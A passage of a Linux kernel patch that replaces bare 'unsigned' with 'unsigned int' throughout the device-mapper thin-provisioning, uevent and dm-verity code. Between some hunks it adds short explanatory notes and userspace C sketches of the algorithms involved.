+ 	struct dm_target *ti;
+ 	struct list_head *devices = dm_table_get_devices(t);
+ 	enum dm_queue_mode live_md_type = dm_get_md_type(t->md);
+@@ -1535,7 +1534,7 @@ static bool dm_table_any_dev_attr(struct dm_table *t,
+ static int count_device(struct dm_target *ti, struct dm_dev *dev,
+ 			sector_t start, sector_t len, void *data)
+ {
+-	unsigned *num_devices = data;
++	unsigned int *num_devices = data;
+ 
+ 	(*num_devices)++;
+ 
+@@ -1565,7 +1564,7 @@ bool dm_table_has_no_data_devices(struct dm_table *t)
+ {
+ 	for (unsigned int i = 0; i < t->num_targets; i++) {
+ 		struct dm_target *ti = dm_table_get_target(t, i);
+-		unsigned num_devices = 0;
++		unsigned int num_devices = 0;
+ 
+ 		if (!ti->type->iterate_devices)
+ 			return false;
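
The realloc_argv() hunk above grows the argv array geometrically (starting at 8 and doubling), so dm_split_args() stays amortized O(n) over a long table line. A userspace sketch of the same growth policy, with plain malloc standing in for the GFP-aware kernel allocation:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char **grow_argv(unsigned int *size, char **old_argv)
{
	unsigned int new_size = *size ? *size * 2 : 8;
	char **argv = malloc(new_size * sizeof(*argv));

	if (argv) {
		if (old_argv)
			memcpy(argv, old_argv, *size * sizeof(*argv));
		*size = new_size;	/* only updated on success */
	}
	free(old_argv);
	return argv;
}

int main(void)
{
	unsigned int size = 0;
	char **argv = grow_argv(&size, NULL);	/* size becomes 8 */

	argv[0] = "demo";
	argv = grow_argv(&size, argv);		/* size becomes 16 */
	printf("%u %s\n", size, argv[0]);
	free(argv);
	return 0;
}

As in the kernel, the caller treats a NULL return as allocation failure and the old array is always released.
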
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 6bcc4c4786d89..80545ec541210 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -318,12 +318,12 @@ static void unpack_block_time(uint64_t v, dm_block_t *b, uint32_t *t)
+  */
+ typedef int (*run_fn)(struct dm_space_map *, dm_block_t, dm_block_t);
+ 
+-static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned count, run_fn fn)
++static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned int count, run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	uint32_t t;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		/* We know value_le is 8 byte aligned */
+@@ -348,13 +348,13 @@ static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned
+ 		fn(sm, begin, end);
+ }
+ 
+-static void data_block_inc(void *context, const void *value_le, unsigned count)
++static void data_block_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_inc_blocks);
+ }
+ 
+-static void data_block_dec(void *context, const void *value_le, unsigned count)
++static void data_block_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_dec_blocks);
+@@ -374,21 +374,21 @@ static int data_block_equal(void *context, const void *value1_le, const void *va
+ 	return b1 == b2;
+ }
+ 
+-static void subtree_inc(void *context, const void *value, unsigned count)
++static void subtree_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		dm_tm_inc(info->tm, le64_to_cpu(*root_le));
+ }
+ 
+-static void subtree_dec(void *context, const void *value, unsigned count)
++static void subtree_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		if (dm_btree_del(info, le64_to_cpu(*root_le)))
+@@ -448,10 +448,10 @@ static int superblock_lock(struct dm_pool_metadata *pmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, int *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -971,7 +971,7 @@ struct dm_pool_metadata *dm_pool_metadata_open(struct block_device *bdev,
+ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ {
+ 	int r;
+-	unsigned open_devices = 0;
++	unsigned int open_devices = 0;
+ 	struct dm_thin_device *td, *tmp;
+ 
+ 	down_read(&pmd->root_lock);
+@@ -1679,7 +1679,7 @@ int dm_thin_insert_block(struct dm_thin_device *td, dm_block_t block,
+ static int __remove_range(struct dm_thin_device *td, dm_block_t begin, dm_block_t end)
+ {
+ 	int r;
+-	unsigned count, total_count = 0;
++	unsigned int count, total_count = 0;
+ 	struct dm_pool_metadata *pmd = td->pmd;
+ 	dm_block_t keys[1] = { td->id };
+ 	__le64 value;
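
The with_runs() hunk above batches reference-count updates by merging consecutive block numbers into [begin, end) runs before calling into the space map, saving one call per block. A simplified sketch of the coalescing loop over a plain array (the kernel version also compares the packed block-time field, omitted here; the callback stands in for dm_sm_inc_blocks/dm_sm_dec_blocks):

#include <stdio.h>
#include <stdbool.h>
#include <stdint.h>

typedef void (*run_fn)(uint64_t begin, uint64_t end);

static void with_runs(const uint64_t *blocks, unsigned int count, run_fn fn)
{
	uint64_t begin = 0, end = 0;
	bool in_run = false;
	unsigned int i;

	for (i = 0; i < count; i++) {
		uint64_t b = blocks[i];

		if (in_run && b == end) {
			end++;			/* extend the current run */
		} else {
			if (in_run)
				fn(begin, end);	/* flush the previous run */
			begin = b;
			end = b + 1;
			in_run = true;
		}
	}
	if (in_run)
		fn(begin, end);
}

static void print_run(uint64_t begin, uint64_t end)
{
	printf("[%llu, %llu)\n", (unsigned long long)begin, (unsigned long long)end);
}

int main(void)
{
	uint64_t blocks[] = { 5, 6, 7, 9, 10, 20 };

	with_runs(blocks, 6, print_run);	/* [5,8) [9,11) [20,21) */
	return 0;
}
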
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index e6e5ab29a95df..ba4ba6be7e232 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -32,7 +32,7 @@
+ #define COMMIT_PERIOD HZ
+ #define NO_SPACE_TIMEOUT_SECS 60
+ 
+-static unsigned no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
++static unsigned int no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
+ 
+ DECLARE_DM_KCOPYD_THROTTLE_WITH_MODULE_PARM(snapshot_copy_throttle,
+ 		"A percentage of time allocated for copy on write");
+@@ -254,7 +254,7 @@ struct pool {
+ 	struct delayed_work no_space_timeout;
+ 
+ 	unsigned long last_commit_jiffies;
+-	unsigned ref_count;
++	unsigned int ref_count;
+ 
+ 	spinlock_t lock;
+ 	struct bio_list deferred_flush_bios;
+@@ -2159,7 +2159,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 	struct bio *bio;
+ 	struct bio_list bios;
+ 	struct blk_plug plug;
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 
+ 	if (tc->requeue_mode) {
+ 		error_thin_bio_list(tc, &tc->deferred_bio_list,
+@@ -2229,9 +2229,9 @@ static int cmp_cells(const void *lhs, const void *rhs)
+ 	return 0;
+ }
+ 
+-static unsigned sort_cells(struct pool *pool, struct list_head *cells)
++static unsigned int sort_cells(struct pool *pool, struct list_head *cells)
+ {
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 	struct dm_bio_prison_cell *cell, *tmp;
+ 
+ 	list_for_each_entry_safe(cell, tmp, cells, user_list) {
+@@ -2252,7 +2252,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 	struct pool *pool = tc->pool;
+ 	struct list_head cells;
+ 	struct dm_bio_prison_cell *cell;
+-	unsigned i, j, count;
++	unsigned int i, j, count;
+ 
+ 	INIT_LIST_HEAD(&cells);
+ 
+@@ -3115,7 +3115,7 @@ static int parse_pool_features(struct dm_arg_set *as, struct pool_features *pf,
+ 			       struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -3252,7 +3252,7 @@ static dm_block_t calc_metadata_threshold(struct pool_c *pt)
+  *	     read_only: Don't allow any changes to be made to the pool metadata.
+  *	     error_if_no_space: error IOs, instead of queueing, if no space.
+  */
+-static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int pool_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r, pool_created = 0;
+ 	struct pool_c *pt;
+@@ -3648,7 +3648,7 @@ static void pool_postsuspend(struct dm_target *ti)
+ 	(void) commit(pool);
+ }
+ 
+-static int check_arg_count(unsigned argc, unsigned args_required)
++static int check_arg_count(unsigned int argc, unsigned int args_required)
+ {
+ 	if (argc != args_required) {
+ 		DMWARN("Message received with %u arguments instead of %u.",
+@@ -3671,7 +3671,7 @@ static int read_dev_id(char *arg, dm_thin_id *dev_id, int warning)
+ 	return -EINVAL;
+ }
+ 
+-static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_thin_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3694,7 +3694,7 @@ static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	dm_thin_id origin_dev_id;
+@@ -3722,7 +3722,7 @@ static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_delete_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3742,7 +3742,7 @@ static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
+ 	return r;
+ }
+ 
+-static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_set_transaction_id_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id old_id, new_id;
+ 	int r;
+@@ -3771,7 +3771,7 @@ static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct po
+ 	return 0;
+ }
+ 
+-static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_reserve_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3788,7 +3788,7 @@ static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct
+ 	return r;
+ }
+ 
+-static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_release_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3812,8 +3812,8 @@ static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct
+  *   reserve_metadata_snap
+  *   release_metadata_snap
+  */
+-static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+-			char *result, unsigned maxlen)
++static int pool_message(struct dm_target *ti, unsigned int argc, char **argv,
++			char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct pool_c *pt = ti->private;
+@@ -3853,9 +3853,9 @@ static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void emit_flags(struct pool_features *pf, char *result,
+-		       unsigned sz, unsigned maxlen)
++		       unsigned int sz, unsigned int maxlen)
+ {
+-	unsigned count = !pf->zero_new_blocks + !pf->discard_enabled +
++	unsigned int count = !pf->zero_new_blocks + !pf->discard_enabled +
+ 		!pf->discard_passdown + (pf->mode == PM_READ_ONLY) +
+ 		pf->error_if_no_space;
+ 	DMEMIT("%u ", count);
+@@ -3883,10 +3883,10 @@ static void emit_flags(struct pool_features *pf, char *result,
+  *    <pool mode> <discard config> <no space config> <needs_check>
+  */
+ static void pool_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	uint64_t transaction_id;
+ 	dm_block_t nr_free_blocks_data;
+ 	dm_block_t nr_free_blocks_metadata;
+@@ -4148,7 +4148,7 @@ static void thin_dtr(struct dm_target *ti)
+  * If the pool device has discards disabled, they get disabled for the thin
+  * device as well.
+  */
+-static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int thin_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	struct thin_c *tc;
+@@ -4371,7 +4371,7 @@ static int thin_preresume(struct dm_target *ti)
+  * <nr mapped sectors> <highest mapped sector>
+  */
+ static void thin_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	ssize_t sz = 0;
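
The sort_cells()/cmp_cells() hunks above copy deferred prison cells into a scratch array and sort them by key so thin-pool I/O is processed in ascending sector order. A userspace analogue using qsort (the cell struct here is a stand-in for struct dm_bio_prison_cell):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

struct cell {
	uint64_t key;	/* e.g. the cell's starting block */
};

static int cmp_cells(const void *lhs, const void *rhs)
{
	const struct cell *l = lhs, *r = rhs;

	if (l->key < r->key)
		return -1;
	if (l->key > r->key)
		return 1;
	return 0;
}

int main(void)
{
	struct cell cells[] = { {42}, {7}, {19} };
	unsigned int i;

	qsort(cells, 3, sizeof(cells[0]), cmp_cells);
	for (i = 0; i < 3; i++)
		printf("%llu\n", (unsigned long long)cells[i].key);	/* 7 19 42 */
	return 0;
}
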
+diff --git a/drivers/md/dm-uevent.c b/drivers/md/dm-uevent.c
+index 8671267200d88..a02b3f6ea47a8 100644
+--- a/drivers/md/dm-uevent.c
++++ b/drivers/md/dm-uevent.c
+@@ -60,7 +60,7 @@ static struct dm_uevent *dm_build_path_uevent(struct mapped_device *md,
+ 					      enum kobject_action action,
+ 					      const char *dm_action,
+ 					      const char *path,
+-					      unsigned nr_valid_paths)
++					      unsigned int nr_valid_paths)
+ {
+ 	struct dm_uevent *event;
+ 
+@@ -168,7 +168,7 @@ EXPORT_SYMBOL_GPL(dm_send_uevents);
+  *
+  */
+ void dm_path_uevent(enum dm_uevent_type event_type, struct dm_target *ti,
+-		   const char *path, unsigned nr_valid_paths)
++		   const char *path, unsigned int nr_valid_paths)
+ {
+ 	struct mapped_device *md = dm_table_get_md(ti->table);
+ 	struct dm_uevent *event;
+diff --git a/drivers/md/dm-uevent.h b/drivers/md/dm-uevent.h
+index d30d226f2a181..2c9ba561fd8e9 100644
+--- a/drivers/md/dm-uevent.h
++++ b/drivers/md/dm-uevent.h
+@@ -20,7 +20,7 @@ extern void dm_uevent_exit(void);
+ extern void dm_send_uevents(struct list_head *events, struct kobject *kobj);
+ extern void dm_path_uevent(enum dm_uevent_type event_type,
+ 			   struct dm_target *ti, const char *path,
+-			   unsigned nr_valid_paths);
++			   unsigned int nr_valid_paths);
+ 
+ #else
+ 
+@@ -37,7 +37,7 @@ static inline void dm_send_uevents(struct list_head *events,
+ }
+ static inline void dm_path_uevent(enum dm_uevent_type event_type,
+ 				  struct dm_target *ti, const char *path,
+-				  unsigned nr_valid_paths)
++				  unsigned int nr_valid_paths)
+ {
+ }
+ 
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 23cffce564035..962fc32c947c5 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -59,14 +59,14 @@ static int fec_decode_rs8(struct dm_verity *v, struct dm_verity_fec_io *fio,
+  * to the data block. Caller is responsible for releasing buf.
+  */
+ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+-			   unsigned *offset, struct dm_buffer **buf)
++			   unsigned int *offset, struct dm_buffer **buf)
+ {
+ 	u64 position, block, rem;
+ 	u8 *res;
+ 
+ 	position = (index + rsb) * v->fec->roots;
+ 	block = div64_u64_rem(position, v->fec->io_size, &rem);
+-	*offset = (unsigned)rem;
++	*offset = (unsigned int)rem;
+ 
+ 	res = dm_bufio_read(v->fec->bufio, block, buf);
+ 	if (IS_ERR(res)) {
+@@ -102,7 +102,7 @@ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+  */
+ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+ 				      struct dm_verity_fec_io *fio,
+-				      unsigned i, unsigned j)
++				      unsigned int i, unsigned int j)
+ {
+ 	return &fio->bufs[i][j * v->fec->rsn];
+ }
+@@ -111,7 +111,7 @@ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+  * Return an index to the current RS block when called inside
+  * fec_for_each_buffer_rs_block.
+  */
+-static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
++static inline unsigned int fec_buffer_rs_index(unsigned int i, unsigned int j)
+ {
+ 	return (i << DM_VERITY_FEC_BUF_RS_BITS) + j;
+ }
+@@ -121,12 +121,12 @@ static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
+  * starting from block_offset.
+  */
+ static int fec_decode_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio,
+-			   u64 rsb, int byte_index, unsigned block_offset,
++			   u64 rsb, int byte_index, unsigned int block_offset,
+ 			   int neras)
+ {
+ 	int r, corrected = 0, res;
+ 	struct dm_buffer *buf;
+-	unsigned n, i, offset;
++	unsigned int n, i, offset;
+ 	u8 *par, *block;
+ 
+ 	par = fec_read_parity(v, rsb, block_offset, &offset, &buf);
+@@ -197,7 +197,7 @@ static int fec_is_erasure(struct dm_verity *v, struct dm_verity_io *io,
+  * fits into buffers. Check for erasure locations if @neras is non-NULL.
+  */
+ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+-			 u64 rsb, u64 target, unsigned block_offset,
++			 u64 rsb, u64 target, unsigned int block_offset,
+ 			 int *neras)
+ {
+ 	bool is_zero;
+@@ -208,7 +208,7 @@ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+ 	u64 block, ileaved;
+ 	u8 *bbuf, *rs_block;
+ 	u8 want_digest[HASH_MAX_DIGESTSIZE];
+-	unsigned n, k;
++	unsigned int n, k;
+ 
+ 	if (neras)
+ 		*neras = 0;
+@@ -304,7 +304,7 @@ done:
+  */
+ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	if (!fio->rs)
+ 		fio->rs = mempool_alloc(&v->fec->rs_pool, GFP_NOIO);
+@@ -344,7 +344,7 @@ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+  */
+ static void fec_init_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	fec_for_each_buffer(fio, n)
+ 		memset(fio->bufs[n], 0, v->fec->rsn << DM_VERITY_FEC_BUF_RS_BITS);
+@@ -362,7 +362,7 @@ static int fec_decode_rsb(struct dm_verity *v, struct dm_verity_io *io,
+ 			  bool use_erasures)
+ {
+ 	int r, neras = 0;
+-	unsigned pos;
++	unsigned int pos;
+ 
+ 	r = fec_alloc_bufs(v, fio);
+ 	if (unlikely(r < 0))
+@@ -484,7 +484,7 @@ done:
+  */
+ void verity_fec_finish_io(struct dm_verity_io *io)
+ {
+-	unsigned n;
++	unsigned int n;
+ 	struct dm_verity_fec *f = io->v->fec;
+ 	struct dm_verity_fec_io *fio = fec_io(io);
+ 
+@@ -522,8 +522,8 @@ void verity_fec_init_io(struct dm_verity_io *io)
+ /*
+  * Append feature arguments and values to the status table.
+  */
+-unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-				 char *result, unsigned maxlen)
++unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++				 char *result, unsigned int maxlen)
+ {
+ 	if (!verity_fec_is_enabled(v))
+ 		return sz;
+@@ -589,7 +589,7 @@ bool verity_is_fec_opt_arg(const char *arg_name)
+ }
+ 
+ int verity_fec_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+-			      unsigned *argc, const char *arg_name)
++			      unsigned int *argc, const char *arg_name)
+ {
+ 	int r;
+ 	struct dm_target *ti = v->ti;
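
On the fec_read_parity() hunk above: a parity byte's location is found by multiplying the RS-block index by the number of roots and splitting the result into a buffer block number and an offset within it, which is exactly the (unsigned int)rem cast being tidied here. A sketch of that address split, with made-up roots/io_size values (the kernel uses div64_u64_rem(); plain / and % suffice in userspace):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint64_t rsb = 1000;		/* assumed offset of this RS block */
	int index = 3;			/* assumed parity block index */
	unsigned int roots = 2;		/* assumed parity bytes per RS block */
	uint64_t io_size = 4096;	/* assumed bytes per parity-device block */

	uint64_t position = (index + rsb) * roots;
	uint64_t block = position / io_size;
	unsigned int offset = (unsigned int)(position % io_size);

	printf("block=%llu offset=%u\n",
	       (unsigned long long)block, offset);	/* block=0 offset=2006 */
	return 0;
}
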
+diff --git a/drivers/md/dm-verity-fec.h b/drivers/md/dm-verity-fec.h
+index 3c46c8d618833..8454070d28242 100644
+--- a/drivers/md/dm-verity-fec.h
++++ b/drivers/md/dm-verity-fec.h
+@@ -55,10 +55,10 @@ struct dm_verity_fec_io {
+ 	struct rs_control *rs;	/* Reed-Solomon state */
+ 	int erasures[DM_VERITY_FEC_MAX_RSN];	/* erasures for decode_rs8 */
+ 	u8 *bufs[DM_VERITY_FEC_BUF_MAX];	/* bufs for deinterleaving */
+-	unsigned nbufs;		/* number of buffers allocated */
++	unsigned int nbufs;		/* number of buffers allocated */
+ 	u8 *output;		/* buffer for corrected output */
+ 	size_t output_pos;
+-	unsigned level;		/* recursion level */
++	unsigned int level;		/* recursion level */
+ };
+ 
+ #ifdef CONFIG_DM_VERITY_FEC
+@@ -72,15 +72,15 @@ extern int verity_fec_decode(struct dm_verity *v, struct dm_verity_io *io,
+ 			     enum verity_block_type type, sector_t block,
+ 			     u8 *dest, struct bvec_iter *iter);
+ 
+-extern unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-					char *result, unsigned maxlen);
++extern unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++					char *result, unsigned int maxlen);
+ 
+ extern void verity_fec_finish_io(struct dm_verity_io *io);
+ extern void verity_fec_init_io(struct dm_verity_io *io);
+ 
+ extern bool verity_is_fec_opt_arg(const char *arg_name);
+ extern int verity_fec_parse_opt_args(struct dm_arg_set *as,
+-				     struct dm_verity *v, unsigned *argc,
++				     struct dm_verity *v, unsigned int *argc,
+ 				     const char *arg_name);
+ 
+ extern void verity_fec_dtr(struct dm_verity *v);
+@@ -106,9 +106,9 @@ static inline int verity_fec_decode(struct dm_verity *v,
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline unsigned verity_fec_status_table(struct dm_verity *v,
+-					       unsigned sz, char *result,
+-					       unsigned maxlen)
++static inline unsigned int verity_fec_status_table(struct dm_verity *v,
++					       unsigned int sz, char *result,
++					       unsigned int maxlen)
+ {
+ 	return sz;
+ }
+@@ -128,7 +128,7 @@ static inline bool verity_is_fec_opt_arg(const char *arg_name)
+ 
+ static inline int verity_fec_parse_opt_args(struct dm_arg_set *as,
+ 					    struct dm_verity *v,
+-					    unsigned *argc,
++					    unsigned int *argc,
+ 					    const char *arg_name)
+ {
+ 	return -EINVAL;
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index ccf5b852fbf7a..64e8ac429984d 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -41,7 +41,7 @@
+ #define DM_VERITY_OPTS_MAX		(4 + DM_VERITY_OPTS_FEC + \
+ 					 DM_VERITY_ROOT_HASH_VERIFICATION_OPTS)
+ 
+-static unsigned dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
++static unsigned int dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
+ 
+ module_param_named(prefetch_cluster, dm_verity_prefetch_cluster, uint, S_IRUGO | S_IWUSR);
+ 
+@@ -51,7 +51,7 @@ struct dm_verity_prefetch_work {
+ 	struct work_struct work;
+ 	struct dm_verity *v;
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ };
+ 
+ /*
+@@ -196,10 +196,10 @@ out:
+ }
+ 
+ static void verity_hash_at_level(struct dm_verity *v, sector_t block, int level,
+-				 sector_t *hash_block, unsigned *offset)
++				 sector_t *hash_block, unsigned int *offset)
+ {
+ 	sector_t position = verity_position_at_level(v, block, level);
+-	unsigned idx;
++	unsigned int idx;
+ 
+ 	*hash_block = v->hash_level_block[level] + (position >> v->hash_per_block_bits);
+ 
+@@ -287,7 +287,7 @@ static int verity_verify_level(struct dm_verity *v, struct dm_verity_io *io,
+ 	u8 *data;
+ 	int r;
+ 	sector_t hash_block;
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	verity_hash_at_level(v, block, level, &hash_block, &offset);
+ 
+@@ -445,13 +445,13 @@ int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 				       struct dm_verity_io *io, u8 *data,
+ 				       size_t len))
+ {
+-	unsigned todo = 1 << v->data_dev_block_bits;
++	unsigned int todo = 1 << v->data_dev_block_bits;
+ 	struct bio *bio = dm_bio_from_per_bio_data(io, v->ti->per_io_data_size);
+ 
+ 	do {
+ 		int r;
+ 		u8 *page;
+-		unsigned len;
++		unsigned int len;
+ 		struct bio_vec bv = bio_iter_iovec(bio, *iter);
+ 
+ 		page = bvec_kmap_local(&bv);
+@@ -688,7 +688,7 @@ static void verity_prefetch_io(struct work_struct *work)
+ 		verity_hash_at_level(v, pw->block, i, &hash_block_start, NULL);
+ 		verity_hash_at_level(v, pw->block + pw->n_blocks - 1, i, &hash_block_end, NULL);
+ 		if (!i) {
+-			unsigned cluster = READ_ONCE(dm_verity_prefetch_cluster);
++			unsigned int cluster = READ_ONCE(dm_verity_prefetch_cluster);
+ 
+ 			cluster >>= v->data_dev_block_bits;
+ 			if (unlikely(!cluster))
+@@ -753,7 +753,7 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+ 	bio_set_dev(bio, v->data_dev->bdev);
+ 	bio->bi_iter.bi_sector = verity_map_sector(v, bio->bi_iter.bi_sector);
+ 
+-	if (((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 	    ((1 << (v->data_dev_block_bits - SECTOR_SHIFT)) - 1)) {
+ 		DMERR_LIMIT("unaligned io");
+ 		return DM_MAPIO_KILL;
+@@ -789,12 +789,12 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+  * Status: V (valid) or C (corruption found)
+  */
+ static void verity_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_verity *v = ti->private;
+-	unsigned args = 0;
+-	unsigned sz = 0;
+-	unsigned x;
++	unsigned int args = 0;
++	unsigned int sz = 0;
++	unsigned int x;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -1054,7 +1054,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+ 				 bool only_modifier_opts)
+ {
+ 	int r = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = v->ti;
+ 	const char *arg_name;
+ 
+@@ -1156,7 +1156,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+  *	<digest>
+  *	<salt>		Hex string or "-" if no salt.
+  */
+-static int verity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_verity *v;
+ 	struct dm_verity_sig_opts verify_args = {0};
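
The verity_hash_at_level() hunk above turns a position within a hash-tree level into a (hash block, byte offset) pair: the high bits of the position select the block, the low bits select the hash slot, scaled by the digest size rounded up to a power of two. A simplified sketch with assumed geometry (4 KiB hash blocks, 32-byte digests, so 128 hashes per block and hash_per_block_bits == 7):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	unsigned int hash_per_block_bits = 7;	/* log2(hashes per block), assumed */
	unsigned int hash_size = 32;		/* padded digest size, assumed */
	uint64_t level_start = 100;		/* first hash block of this level */
	uint64_t position = 300;		/* index of the wanted hash in this level */

	uint64_t hash_block = level_start + (position >> hash_per_block_bits);
	unsigned int idx = position & ((1u << hash_per_block_bits) - 1);
	unsigned int offset = idx * hash_size;	/* kernel does idx << log2(hash_size) */

	printf("hash_block=%llu offset=%u\n",
	       (unsigned long long)hash_block, offset);	/* 102 1408 */
	return 0;
}
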
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 98f306ec6a33d..2f555b4203679 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -42,7 +42,7 @@ struct dm_verity {
+ 	u8 *root_digest;	/* digest of the root block */
